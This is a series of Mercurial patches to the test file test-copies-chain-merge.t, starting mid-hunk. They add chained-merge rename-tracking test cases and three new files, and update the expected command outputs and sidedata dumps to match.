different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEA,Jm: chained merges (conflict -> simple) - same content everywhere + mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFG,Om: chained merges (copy-overwrite -> simple) - same content @@ -1278,6 +1334,16 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "mAE-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; + ##### revision "mEA-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -1628,6 +1694,8 @@ 0 * b76eb76580df 000000000000 000000000000 1 * e8825b386367 000000000000 000000000000 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f @@ -1640,6 +1708,8 @@ $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -2191,6 +2261,133 @@ $ hg status --copies --rev 'desc("h-1")' --rev 
'desc("mHC-delete-before-conflict-m")' R a +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +(see case declaration for details) + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) +- the merge add new change to b + + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + o mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d + | + o i-1: a -move-> c + | + o i-0 initial commit: a b h + +#if no-changeset + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + 2f649fba7eb284e720d02b61f0546fcef694c045 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 774e7c1637d536b99e2d8ef16fd731f87a82bd09 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + e8825b386367b29fec957283a80bb47b47483fe1 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df +#else + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + d3613c1ec8310a812ac4268fd853ac576b6caea5 644 f + $ hg 
manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 05e03c868bbcab4a649cb33a238d7aa07398a469 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exists on both sides). However the changelog +# based one works fine. We have different output. + + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAE-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEA-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAE-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEA-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' + A f + d + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("e-2")' + A f + b + R b + +# From here, we run status against revisions where both source files exist. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm uses the parent order to break ties on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable across repositories. 
(data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mAE-change-m-0")' + A f + d + R b + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mEA-change-m-0")' + A f + d (filelog !) + b (no-filelog !) + R b + R d + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")' + A f + a + R a + R b + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")' + A f + a (filelog !) + b (no-filelog !) + R a + R b + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613749075 -3600 # Fri Feb 19 16:37:55 2021 +0100 # Node ID 664bee002d1a3c11b5042d7bf2c56066c1953d8a # Parent 3aef76c3fd3822d134d12eb5c8fb2eb2c77738bc test-copies: introduce merge chaining test for the A/E + change tests This is similar to the chaining test we have for the A/E merges (without change). The current result of these tests is wrong, as for their "without change" counterparts. This will be fixed by later changesets. Differential Revision: https://phab.mercurial-scm.org/D10052 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1027,6 +1027,89 @@ o i-0 initial commit: a b h +Subcase: chaining conflicting rename resolution, with extra change during the merge +```````````````````````````````````````````````````````````````````````````````````` + +The "mEA-change-m-0" and "mAE-change-m-0" cases create a rename tracking conflict on file 'f'. We +add more changes on the respective branches and merge again. These second merges +do not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. 
+ + $ case_desc="chained merges (conflict+change -> simple) - same content on both branch in the initial merge" + + +(merge variant 1) + + $ hg up 'desc("mAE-change-m")' + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE-change,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mAE-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mK,AE-change-m: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mEA-change,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mJ,EA-change-m: $case_desc" + created new head + + + $ hg log -G --rev '::(desc("mAE-change,Km") + desc("mK,AE-change-m") + desc("mEA-change,Jm") + desc("mJ,EA-change-m"))' + @ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + |\ + +---o mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | |/ + | | o mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | |\ + | | +---o mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial 
merge + | | | |/ + | | | o k-1: unrelated changes (based on "e" changes) + | | | | + | o | | j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |/ / / + | o / mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + |/|/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d + | + o i-1: a -move-> c + | + o i-0 initial commit: a b h + + Summary of all created cases ---------------------------- @@ -1055,6 +1138,7 @@ l-1: unrelated changes (based on "c" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAE,Km: chained merges (conflict -> simple) - same content everywhere + mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way @@ -1073,6 +1157,7 @@ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEA,Jm: chained merges (conflict -> simple) - same content everywhere + mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b 
to f, (same content for f in parent) - the other way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way @@ -1083,7 +1168,9 @@ mGF,Nm: chained merges (copy-overwrite -> simple) - same content mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mJ,EAm: chained merges (conflict -> simple) - same content everywhere + mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mK,AEm: chained merges (conflict -> simple) - same content everywhere mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) @@ -1417,6 +1504,22 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "mAE-change,Km" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mK,AE-change-m" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mEA-change,Jm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mJ,EA-change-m" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -2553,3 +2656,57 @@ a (missing-correct-output upgraded !) h (known-bad-output sidedata !) h (known-bad-output upgraded !) 
+ + +Subcase: chaining conflicting rename resolution, with extra change during the merge +```````````````````````````````````````````````````````````````````````````````````` + +The "mAEm" and "mEAm" cases create a rename tracking conflict on file 'f'. We +add more changes on the respective branches and merge again. These second merges +do not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f + A f + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + b (known-bad-output sidedata !) + b (known-bad-output upgraded !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f + A f + a (filelog !) + b (missing-correct-output sidedata !) + b (missing-correct-output upgraded !) + a (known-bad-output sidedata !) + a (known-bad-output upgraded !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613750772 -3600 # Fri Feb 19 17:06:12 2021 +0100 # Node ID 46205a478a08ce7adcf622d8bf9c199dff8d1a10 # Parent 664bee002d1a3c11b5042d7bf2c56066c1953d8a test-copies: add 3 new files with their own content The new `p`, `q` and `r` files mirror the `a`, `b` and `h` ones but with different content for each file. 
This will be used to create "mirror" test case that involve actual merge happening. For now, we only add the file to keep patches small and easier to review. Differential Revision: https://phab.mercurial-scm.org/D10053 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -75,10 +75,16 @@ $ cp ../same-content.txt a $ cp ../same-content.txt b $ cp ../same-content.txt h + $ echo "original content for P" > p + $ echo "original content for Q" > q + $ echo "original content for R" > r $ hg ci -Am 'i-0 initial commit: a b h' adding a adding b adding h + adding p + adding q + adding r $ hg mv a c $ hg ci -Am 'i-1: a -move-> c' $ hg mv c d @@ -652,7 +658,7 @@ $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)" $ hg up 'desc("i-0")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg mv b d $ hg ci -m "h-1: b -(move)-> d" created new head @@ -1228,6 +1234,9 @@ added : a, ; added : b, ; added : h, ; + added : p, ; + added : q, ; + added : r, ; $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'` @@ -1237,11 +1246,14 @@ > done ##### revision "i-0 initial commit" ##### 1 sidedata entries - entry-0014 size 34 - '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh' + entry-0014 size 64 + '\x00\x00\x00\x06\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00abhpqr' added : a, ; added : b, ; added : h, ; + added : p, ; + added : q, ; + added : r, ; ##### revision "i-1" ##### 1 sidedata entries 
entry-0014 size 24 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613757429 -3600 # Fri Feb 19 18:57:09 2021 +0100 # Node ID 0ebfd02dafd5f1aef5f1e8a51e44c0ebeff9e86b # Parent 46205a478a08ce7adcf622d8bf9c199dff8d1a10 test-copies: move the new files in the `i` branch The initial branch is moving some of the "same content" file around. We do the same for the "different content" before start to implement more tests. The new files have harmless impact of various existing tests. Differential Revision: https://phab.mercurial-scm.org/D10054 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -86,13 +86,15 @@ adding q adding r $ hg mv a c - $ hg ci -Am 'i-1: a -move-> c' + $ hg mv p s + $ hg ci -Am 'i-1: a -move-> c, p -move-> s' $ hg mv c d - $ hg ci -Am 'i-2: c -move-> d' + $ hg mv s t + $ hg ci -Am 'i-2: c -move-> d, s -move-> t' $ hg log -G - @ i-2: c -move-> d + @ i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -108,9 +110,9 @@ | o a-1: d -move-> e | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -125,9 +127,9 @@ $ hg log -G --rev '::.' @ b-1: b update | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -142,9 +144,9 @@ $ hg log -G --rev '::.' 
@ c-1 delete d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -164,9 +166,9 @@ | o d-1 delete d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -185,9 +187,9 @@ | o e-1 b -move-> g | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -230,9 +232,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -280,9 +282,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -320,9 +322,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -368,9 +370,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -423,9 +425,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -475,9 +477,9 @@ | | o | d-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -530,9 +532,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -588,9 +590,9 @@ | | o | c-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s 
| o i-0 initial commit: a b h @@ -637,9 +639,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -664,16 +666,16 @@ created new head $ hg up 'desc("c-1")' - 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved $ hg merge 'desc("h-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way" $ hg up 'desc("h-1")' - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("c-1")' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" created new head @@ -686,9 +688,9 @@ | | o | c-1 delete d | | - o | i-2: c -move-> d + o | i-2: c -move-> d, s -move-> t | | - o | i-1: a -move-> c + o | i-1: a -move-> c, p -move-> s |/ o i-0 initial commit: a b h @@ -740,9 +742,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -847,9 +849,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -930,9 +932,9 @@ | | | o b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1026,9 +1028,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p 
-move-> s | o i-0 initial commit: a b h @@ -1109,9 +1111,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1137,8 +1139,8 @@ g-1: update d h-1: b -(move)-> d i-0 initial commit: a b h - i-1: a -move-> c - i-2: c -move-> d + i-1: a -move-> c, p -move-> s + i-2: c -move-> d, s -move-> t j-1: unrelated changes (based on the "a" series of changes) k-1: unrelated changes (based on "e" changes) l-1: unrelated changes (based on "c" changes) @@ -1256,16 +1258,20 @@ added : r, ; ##### revision "i-1" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02acps' removed : a, ; added p1: c, a; + removed : p, ; + added p1: s, p; ##### revision "i-2" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02cdst' removed : c, ; added p1: d, c; + removed : s, ; + added p1: t, s; ##### revision "a-1" ##### 1 sidedata entries entry-0014 size 24 @@ -1547,7 +1553,10 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' f A f a (no-changeset no-compatibility !) 
@@ -1569,9 +1578,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1602,12 +1611,18 @@ M b A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBAm")' M b A f a + A t + p R a + R p merging with the side having a delete ------------------------------------- @@ -1630,9 +1645,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1654,10 +1669,16 @@ R d $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-0")' M b + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-0")' M b + A t + p R a + R p - comparing with the merge children re-adding the file @@ -1680,11 +1701,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-1")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-1")' M b A d + A t + p R a + R p Comparing with a merge re-adding the file afterward --------------------------------------------------- @@ -1704,9 +1731,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1760,11 +1787,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBDm-0")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDBm-0")' M b A d + A t + p R a + R p Comparing with a merge with colliding rename @@ -1789,9 +1822,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1881,14 +1914,20 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm-0")' A f a + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm-0")' A f a 
(filelog !) b (no-filelog !) + A t + p R a R b + R p Subcase: existing copy information overwritten on one branch @@ -1914,9 +1953,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -1924,14 +1963,20 @@ M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFBm-0")' M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")' M d (no-changeset !) h (no-filelog no-changeset !) @@ -1966,7 +2011,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -1982,7 +2027,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2008,9 +2053,9 @@ | | o | d-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2023,11 +2068,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDGm-0")' A d a (filelog !) 
+ A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGDm-0")' A d a + A t + p R a + R p $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mDGm-0")' M d $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mGDm-0")' @@ -2045,9 +2096,9 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2060,7 +2111,7 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2074,9 +2125,9 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2089,7 +2140,7 @@ | | o | d-2 re-add d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2116,9 +2167,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2153,14 +2204,20 @@ A d h (no-filelog !) a (filelog !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")' A d a (no-changeset !) h (changeset !) 
